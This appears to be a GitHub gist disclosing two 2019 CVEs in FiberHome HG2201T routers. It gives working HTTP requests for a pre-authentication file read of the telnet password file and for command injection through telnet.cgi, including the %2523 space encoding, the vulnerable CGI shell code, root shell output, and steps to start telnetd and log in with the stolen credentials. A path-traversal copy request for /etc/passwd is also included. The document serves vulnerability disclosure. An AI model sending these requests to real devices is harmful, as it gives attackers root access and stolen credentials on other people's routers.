Skip to content

Instantly share code, notes, and snippets.

@ztz472947849

ztz472947849/FiberHome HG2201T Pre-Auth RCE.md Secret

Last active October 21, 2019 07:41
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save ztz472947849/d62e7b6f4831b55c338ef22432eca06d to your computer and use it in GitHub Desktop.
Save ztz472947849/d62e7b6f4831b55c338ef22432eca06d to your computer and use it in GitHub Desktop.
Download ZIP
FiberHome HG2201T Pre-Auth RCE
Raw
FiberHome HG2201T Pre-Auth RCE.md

FiberHome HG2201T Pre-Auth RCE

1. Pre-Auth arbitrary file read CVE-2019-17187

POST /cgi-bin/downloadfile.cgi HTTP/1.1
Host: 192.168.1.1:8080
Connection: close
Content-Length: 24

downpath=/var/tel_passwd

Then download from

http://192.168.1.1:8080/download.tar

root:<plaintext password>:0:0:root:/:/bin/sh
tianyi:<plaintext password>:0:0:root:/:/bin/sh

Vuln code: /var/WEB-GUI/cgi-bin/downloadfile.cgi

setdownloadfile()
{
	LINE=`./getpostdata.cgi $CONTENT_LENGTH`
	[ "x$LINE" == "x" ] && READERR=1
	[ "x$LINE" != "x" ] && LINE=`./urldecode.cgi $LINE`

    paramIndex="1"
    CGIParam=`echo "$LINE&" | cut -d '&' -f $paramIndex`
    while [ "$CGIParam" != "" ]
	do
	  par=`echo "$CGIParam" | cut -d '=' -f 1`
	  val=`echo "$CGIParam" | cut -d '=' -f 2`
	  if [ "$val" != "" ]; then
		case $par
			in
			"downpath")
			DOWNPATH=$val
			;;
		esac
	  fi
	  paramIndex=$((paramIndex+1))
	  CGIParam=`echo "$LINE&" | cut -d '&' -f $paramIndex`
	  is_submit="1"
    done

	if [ "$is_submit" == "1" ]; then
		tar -cvf /var/WEB-GUI/download.tar $DOWNPATH >/dev/null 2>&1
	fi
}

Description
FiberHome HG2201T 1.00.M5007_JS_201804 devices allows pre-authentication Directory Traversal for reading arbitrary files.
Vulnerability Type
Incorrect Access Control/Directory Traversal
Vendor of Product
Fiberhome
Affected Product Code Base
HG2201T - HG2201T_1.00.M5007_JS_201804
Affected Component
/var/WEB-GUI/cgi-bin/downloadfile.cgi
Attack Type
Remote

2. Pre-Auth remote code execution CVE-2019-17186

POST /cgi-bin/telnet.cgi HTTP/1.1
Host: 192.168.1.1:8080
Connection: close
Content-Length: 38

InputCmd=ping%25231.1.1.1%2523-c%25233
/var/WEB-GUI # cat telnet_output.log
cat telnet_output.log
PING 1.1.1.1 (1.1.1.1): 56 data bytes
64 bytes from 1.1.1.1: seq=0 ttl=55 time=176.370 ms
64 bytes from 1.1.1.1: seq=1 ttl=55 time=177.170 ms
64 bytes from 1.1.1.1: seq=2 ttl=55 time=175.522 ms

--- 1.1.1.1 ping statistics ---
3 packets transmitted, 3 packets received, 0% packet loss
round-trip min/avg/max = 175.522/176.354/177.170 ms

Vuln code: /var/WEB-GUI/cgi-bin/telnet.cgi (Notice urldecode and sed in query string processing, space needs to be submitted as %2523. To get shell, simply run telnetd and login with credentials read from /var/tel_passwd and/or telWan_passwd on port 23 via telnet)

settelnet()
{
	QUERY_STRING=`./getpostdata.cgi $CONTENT_LENGTH`
	[ "x$QUERY_STRING" == "x" ] && READERR=1
	[ "x$QUERY_STRING" != "x" ] && QUERY_STRING=`./urldecode.cgi $QUERY_STRING`

paramIndex="1"
CGIParam=`echo "$QUERY_STRING&" | cut -d '&' -f $paramIndex`
while [ "$CGIParam" != "" ]
    do
    par=`echo "$CGIParam" | cut -d '=' -f 1`
    val=`echo "$CGIParam" | cut -d '=' -f 2`
    if [ "$val" != "" ]; then
        case $par
            in
            "InputCmd")
            INPUTCMD=$val
            INPUTCMD=`echo "$INPUTCMD" | sed 's/%23/ /g'`
            ;;
        esac
    fi
    paramIndex=$((paramIndex+1))
    CGIParam=`echo "$QUERY_STRING&" | cut -d '&' -f $paramIndex`
    is_submit="1"
done

if [ "$is_submit" == "1" ]; then
	rm /var/WEB-GUI/telnet_* >/dev/null 2>&1
    echo "${INPUTCMD}" >/var/WEB-GUI/telnet_input.log
    echo "${INPUTCMD}" >/var/WEB-GUI/telnet_input.sh
    chmod +x /var/WEB-GUI/telnet_input.sh
	cd /var/WEB-GUI/
    ./telnet_input.sh >/var/WEB-GUI/telnet_output.log 2>&1
fi

echo "
{\"RETURN\":
  {\"success\": true}
}"
}

telnet sh shell

/var # id
id
uid=0(root) gid=0(root) groups=0(root)
/var # uname -a
uname -a
Linux localhost 3.18.21+ #6 SMP Fri Sep 7 19:28:01 CST 2018 mips GNU/Linux

Description
FiberHome HG2201T 1.00.M5007_JS_201804 devices allows pre-authentication remote code execution.
Vulnerability Type
Incorrect Access Control
Vendor of Product
Fiberhome
Affected Product Code Base
HG2201T - HG2201T_1.00.M5007_JS_201804
Affected Component
/var/WEB-GUI/cgi-bin/telnet.cgi
Attack Type
Remote

How i found this

HG2201T runs http server on both 80 and 8080 with firmware version HG2201T_1.00.M5007_JS_201804

An auth-ed user is able to manage files on flash driver (if pluged-in) using web interface by design.

However, this file manager can be invoked without the existence of flash driver as well as easily path traversed (this can be a CVE as well), then we get an arbitrary file read after this, by copying /some/thing to /mnt/usb_x/somewhere while httpd runs on root priv.

A 'copy to' query looks alike

POST /cgi-bin/luci/admin/storage/copyMove HTTP/1.1
Host: 192.168.1.1
Cookie: sysauth=<fixed upon login>
Connection: close

token=<fixed upon login>&opstr=copy%7C%2Fetc%2F%7C%2Fvar%2FWEB-GUI%2F%7Cpasswd&fileLists=passwd%2F&_=0.1327969112555747

Key query string

opstr=copy|/etc/|/var/WEB-GUI/|passwd&fileLists=passwd

By reviewing a bit cgi files served on 8080, we get pre-auth RCE. Both vuln code pieces were hidden in cgi-bin folder, no served front-end.

Credit: PF7@Chaitin Tech.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment